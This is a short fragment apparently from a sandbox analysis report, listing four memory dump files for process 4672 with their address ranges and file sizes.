                                                                                                        • memory/4672-44-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4672-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4672-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4672-40-0x00007FF9BE6F0000-0x00007FF9BE8E5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB